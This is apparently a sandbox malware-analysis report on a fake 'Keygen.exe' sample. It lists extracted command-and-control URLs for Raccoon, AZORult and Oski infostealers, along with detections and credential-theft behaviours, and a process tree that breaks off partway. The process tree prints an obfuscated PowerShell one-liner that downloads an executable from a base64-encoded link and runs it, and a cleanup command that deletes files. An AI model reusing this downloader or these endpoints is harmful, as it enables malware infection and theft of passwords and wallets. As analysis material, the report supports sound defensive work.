Overview
overview
10Static
static
101.bin/1.exe
windows10_x64
102019-09-02...10.exe
windows10_x64
1031.exe
windows10_x64
103DMark 11 ...on.exe
windows10_x64
15da0116af4...18.exe
windows10_x64
10Archive.zi...3e.exe
windows10_x64
6CVE-2018-1...oC.swf
windows10_x64
3CVWSHSetup...1].exe
windows10_x64
4DiskIntern...en.exe
windows10_x64
1ForceOp 2....ce.exe
windows10_x64
10HYDRA.exe
windows10_x64
10Keygen.exe
windows10_x64
10Lonelyscre...ox.exe
windows10_x64
1LtHv0O2KZDK4M637.exe
windows10_x64
10Magic_File...ja.exe
windows10_x64
1OnlineInstaller.exe
windows10_x64
10Remouse.Mi...cg.exe
windows10_x64
1SecurityTa...up.exe
windows10_x64
8Treasure.V...ox.exe
windows10_x64
1VyprVPN.exe
windows10_x64
10WSHSetup[1].exe
windows10_x64
3___ _ ____...��.exe
windows10_x64
10___ _ ____...��.exe
windows10_x64
10amtemu.v0....ed.exe
windows10_x64
10api.exe
windows10_x64
1default.exe
windows10_x64
10efd97b1038...ea4.js
windows10_x64
3good.exe
windows10_x64
10infected d...er.exe
windows10_x64
8oof.exe
windows10_x64
10ou55sg33s_1.exe
windows10_x64
10update.exe
windows10_x64
10Resubmissions
12-11-2021 18:04
211112-wnzb8aahhm 1019-11-2020 10:08
201119-rhwlt38jrx 1018-11-2020 17:26
201118-htd4fq29va 10Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
12-11-2021 18:04
Behavioral task
behavioral1
Sample
1.bin/1.exe
Resource
win10-en-20211014
Behavioral task
behavioral2
Sample
2019-09-02_22-41-10.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
31.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
3DMark 11 Advanced Edition.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10-en-20211104
Behavioral task
behavioral6
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
CVE-2018-15982_PoC.swf
Resource
win10-en-20211104
Behavioral task
behavioral8
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
HYDRA.exe
Resource
win10-en-20211104
Behavioral task
behavioral12
Sample
Keygen.exe
Resource
win10-en-20211104
Behavioral task
behavioral13
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10-en-20211014
Behavioral task
behavioral14
Sample
LtHv0O2KZDK4M637.exe
Resource
win10-en-20211104
Behavioral task
behavioral15
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10-en-20211014
Behavioral task
behavioral16
Sample
OnlineInstaller.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10-en-20211014
Behavioral task
behavioral18
Sample
SecurityTaskManager_Setup.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10-en-20211104
Behavioral task
behavioral20
Sample
VyprVPN.exe
Resource
win10-en-20211014
Behavioral task
behavioral21
Sample
WSHSetup[1].exe
Resource
win10-en-20211104
Behavioral task
behavioral22
Sample
___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe
Resource
win10-en-20211014
Behavioral task
behavioral23
Sample
___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe
Resource
win10-en-20211104
Behavioral task
behavioral24
Sample
amtemu.v0.9.2.win-painter_edited.exe
Resource
win10-en-20211104
Behavioral task
behavioral25
Sample
api.exe
Resource
win10-en-20211014
Behavioral task
behavioral26
Sample
default.exe
Resource
win10-en-20211104
Behavioral task
behavioral27
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10-en-20211014
Behavioral task
behavioral28
Sample
good.exe
Resource
win10-en-20211104
Behavioral task
behavioral29
Sample
infected dot net installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral30
Sample
oof.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
ou55sg33s_1.exe
Resource
win10-en-20211014
General
-
Target
Keygen.exe
-
Size
849KB
-
MD5
dbde61502c5c0e17ebc6919f361c32b9
-
SHA1
189749cf0b66a9f560b68861f98c22cdbcafc566
-
SHA256
88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b
-
SHA512
d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb
Malware Config
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
raccoon
32365171a31c4583d6e3b7aad1690e41cefc38eb
-
url4cnc
http://telegalive.top/brikitiki
http://toptelete.top/brikitiki
http://telegraf.top/brikitiki
https://t.me/brikitiki
Extracted
azorult
http://195.245.112.115/index.php
Extracted
oski
colonna.ac.ug
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 4892 created 4848 4892 WerFault.exe 104 -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
-
Blocklisted process makes network request 4 IoCs
flow pid Process 26 1768 powershell.exe 27 1536 powershell.exe 28 2012 powershell.exe 33 1536 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
pid Process 3920 Keygen.exe 4156 sko.exe 4212 qdt.exe 4300 yfu.exe 4404 cdvcxsdme.exe 4428 vbndfgame.exe 4824 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4848 qdt.exe 4884 sko.exe 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 2344 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4296 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 3204 Dxndvkhrxwosconsoleapp14.exe 3628 Dxndvkhrxwosconsoleapp14.exe 4184 cc.exe 4484 pm.exe 4596 Dxndvkhrxwosconsoleapp14.exe 4616 Dxndvkhrxwosconsoleapp14.exe 5040 aspnet_compiler.exe 1556 cc.exe 1760 yfu.exe 1272 vbndfgame.exe 2404 cdvcxsdme.exe -
Loads dropped DLL 10 IoCs
pid Process 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4596 Dxndvkhrxwosconsoleapp14.exe 4596 Dxndvkhrxwosconsoleapp14.exe 4596 Dxndvkhrxwosconsoleapp14.exe 1272 vbndfgame.exe 1272 vbndfgame.exe 1272 vbndfgame.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\winda = "\"C:\\Users\\Admin\\AppData\\Roaming\\winda.exe\"" pm.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 4212 set thread context of 4848 4212 qdt.exe 104 PID 4156 set thread context of 4884 4156 sko.exe 103 PID 4824 set thread context of 2020 4824 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 107 PID 4836 set thread context of 4296 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 109 PID 3204 set thread context of 4596 3204 Dxndvkhrxwosconsoleapp14.exe 117 PID 3628 set thread context of 4616 3628 Dxndvkhrxwosconsoleapp14.exe 118 PID 4484 set thread context of 5040 4484 pm.exe 125 PID 4184 set thread context of 1556 4184 cc.exe 127 PID 4300 set thread context of 1760 4300 yfu.exe 132 PID 4428 set thread context of 1272 4428 vbndfgame.exe 133 PID 4404 set thread context of 2404 4404 cdvcxsdme.exe 134 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 4820 4616 WerFault.exe 118 4892 4848 WerFault.exe 104 -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vbndfgame.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Dxndvkhrxwosconsoleapp14.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4272 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 596 timeout.exe 4564 timeout.exe 1576 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 4996 taskkill.exe 3840 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings qdt.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings sko.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings cmd.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 cc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e cc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1536 powershell.exe 1264 powershell.exe 1508 powershell.exe 2012 powershell.exe 2344 powershell.exe 1768 powershell.exe 1264 powershell.exe 2344 powershell.exe 1768 powershell.exe 1508 powershell.exe 1536 powershell.exe 2012 powershell.exe 2344 powershell.exe 1264 powershell.exe 2012 powershell.exe 1768 powershell.exe 1508 powershell.exe 1536 powershell.exe 4156 sko.exe 4212 qdt.exe 4212 qdt.exe 4212 qdt.exe 4156 sko.exe 4156 sko.exe 4824 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4824 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4824 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 3204 Dxndvkhrxwosconsoleapp14.exe 3628 Dxndvkhrxwosconsoleapp14.exe 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 2020 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4484 pm.exe 3204 Dxndvkhrxwosconsoleapp14.exe 3204 Dxndvkhrxwosconsoleapp14.exe 3628 Dxndvkhrxwosconsoleapp14.exe 3628 Dxndvkhrxwosconsoleapp14.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4820 WerFault.exe 4484 pm.exe 4484 pm.exe 4892 WerFault.exe 4892 WerFault.exe 4892 WerFault.exe 4892 WerFault.exe 4892 WerFault.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4300 yfu.exe 4428 vbndfgame.exe 4404 cdvcxsdme.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 4156 sko.exe Token: SeDebugPrivilege 4212 qdt.exe Token: SeDebugPrivilege 4824 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Token: SeDebugPrivilege 4836 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Token: SeDebugPrivilege 3204 Dxndvkhrxwosconsoleapp14.exe Token: SeDebugPrivilege 3628 Dxndvkhrxwosconsoleapp14.exe Token: SeDebugPrivilege 4484 pm.exe Token: SeRestorePrivilege 4820 WerFault.exe Token: SeBackupPrivilege 4820 WerFault.exe Token: SeDebugPrivilege 4820 WerFault.exe Token: SeDebugPrivilege 4996 taskkill.exe Token: SeDebugPrivilege 4892 WerFault.exe Token: SeDebugPrivilege 5040 aspnet_compiler.exe Token: SeDebugPrivilege 3840 taskkill.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3920 Keygen.exe 4300 yfu.exe 4404 cdvcxsdme.exe 4428 vbndfgame.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1016 wrote to memory of 4020 1016 Keygen.exe 68 PID 1016 wrote to memory of 4020 1016 Keygen.exe 68 PID 1016 wrote to memory of 4020 1016 Keygen.exe 68 PID 4020 wrote to memory of 3920 4020 cmd.exe 71 PID 4020 wrote to memory of 3920 4020 cmd.exe 71 PID 4020 wrote to memory of 3920 4020 cmd.exe 71 PID 4020 wrote to memory of 3556 4020 cmd.exe 72 PID 4020 wrote to memory of 3556 4020 cmd.exe 72 PID 4020 wrote to memory of 3556 4020 cmd.exe 72 PID 4020 wrote to memory of 1584 4020 cmd.exe 73 PID 4020 wrote to memory of 1584 4020 cmd.exe 73 PID 4020 wrote to memory of 1584 4020 cmd.exe 73 PID 4020 wrote to memory of 1576 4020 cmd.exe 74 PID 4020 wrote to memory of 1576 4020 cmd.exe 74 PID 4020 wrote to memory of 1576 4020 cmd.exe 74 PID 4020 wrote to memory of 396 4020 cmd.exe 75 PID 4020 wrote to memory of 396 4020 cmd.exe 75 PID 4020 wrote to memory of 396 4020 cmd.exe 75 PID 4020 wrote to memory of 400 4020 cmd.exe 76 PID 4020 wrote to memory of 400 4020 cmd.exe 76 PID 4020 wrote to memory of 400 4020 cmd.exe 76 PID 4020 wrote to memory of 596 4020 cmd.exe 77 PID 4020 wrote to memory of 596 4020 cmd.exe 77 PID 4020 wrote to memory of 596 4020 cmd.exe 77 PID 4020 wrote to memory of 344 4020 cmd.exe 78 PID 4020 wrote to memory of 344 4020 cmd.exe 78 PID 4020 wrote to memory of 344 4020 cmd.exe 78 PID 4020 wrote to memory of 1912 4020 cmd.exe 79 PID 4020 wrote to memory of 1912 4020 cmd.exe 79 PID 4020 wrote to memory of 1912 4020 cmd.exe 79 PID 1912 wrote to memory of 1264 1912 mshta.exe 82 PID 1912 wrote to memory of 1264 1912 mshta.exe 82 PID 1912 wrote to memory of 1264 1912 mshta.exe 82 PID 396 wrote to memory of 2344 396 mshta.exe 81 PID 396 wrote to memory of 2344 396 mshta.exe 81 PID 396 wrote to memory of 2344 396 mshta.exe 81 PID 3556 wrote to memory of 1536 3556 mshta.exe 80 PID 3556 wrote to memory of 1536 3556 mshta.exe 80 PID 3556 wrote to memory of 1536 3556 mshta.exe 80 PID 1584 wrote to memory of 1508 1584 mshta.exe 83 PID 1584 wrote to memory of 1508 1584 mshta.exe 83 PID 1584 wrote to memory of 1508 1584 mshta.exe 83 PID 344 wrote to memory of 2012 344 mshta.exe 88 PID 344 wrote to memory of 2012 344 mshta.exe 88 PID 344 wrote to memory of 2012 344 mshta.exe 88 PID 400 wrote to memory of 1768 400 mshta.exe 85 PID 400 wrote to memory of 1768 400 mshta.exe 85 PID 400 wrote to memory of 1768 400 mshta.exe 85 PID 1768 wrote to memory of 4156 1768 powershell.exe 94 PID 1768 wrote to memory of 4156 1768 powershell.exe 94 PID 1768 wrote to memory of 4156 1768 powershell.exe 94 PID 2344 wrote to memory of 4212 2344 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 95 PID 2344 wrote to memory of 4212 2344 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 95 PID 2344 wrote to memory of 4212 2344 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 95 PID 1536 wrote to memory of 4300 1536 powershell.exe 96 PID 1536 wrote to memory of 4300 1536 powershell.exe 96 PID 1536 wrote to memory of 4300 1536 powershell.exe 96 PID 4300 wrote to memory of 4404 4300 yfu.exe 97 PID 4300 wrote to memory of 4404 4300 yfu.exe 97 PID 4300 wrote to memory of 4404 4300 yfu.exe 97 PID 4300 wrote to memory of 4428 4300 yfu.exe 98 PID 4300 wrote to memory of 4428 4300 yfu.exe 98 PID 4300 wrote to memory of 4428 4300 yfu.exe 98 PID 4212 wrote to memory of 4692 4212 qdt.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\60C9.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3920
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Users\Public\yfu.exe"C:\Users\Public\yfu.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"7⤵
- Executes dropped EXE
PID:2404
-
-
-
C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1272 & erase C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe & RD /S /Q C:\\ProgramData\\333368708752611\\* & exit8⤵PID:1464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 12729⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
-
-
-
C:\Users\Public\yfu.exe"C:\Users\Public\yfu.exe"6⤵
- Executes dropped EXE
PID:1760
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
